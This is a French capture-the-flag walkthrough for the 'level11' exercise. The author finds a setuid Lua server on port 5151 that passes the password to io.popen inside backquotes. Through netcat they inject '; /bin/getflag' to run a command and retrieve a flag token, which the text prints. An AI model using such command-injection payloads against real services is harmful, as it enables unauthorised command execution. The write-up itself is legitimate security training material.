* Dans le home il y a un script lua $ ll > rwsr-sr-x 1 flag11 level11 668 Mar 5 2016 level11.lua* * Ca semble etre un server. On tante de se conecter au localhost avec le port 5151 $ nc localhost 5151 > Password: kjksd > Erf nope.. * Il semblerait donc que ce soit bien a ce stript lua que l'on comunique via netcat. * On peut trouver le nombre f05d1d066fb246efe0c6f7d095f909a7a0cf34a0. * Google nous apprend que c'est le hash de "NotSoEasy" toute fois ce mot de passe ne donne rien * Par contre en observant mieux on voit qu'une chaine ne charactere comptenant * le mot de passe que l'on envoie semble etre executer en shell avec les back quot line 11 * io.popen() lance un souproces et execute la chaine e character qui lui est envoyer. * On va essayer de lancer getflag en arretant la comande avec ';' $ nc localhost 5151 > Password: ; /bin/getflag > /tmp/bingo $ cat /tmp/bingo > Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s BINGO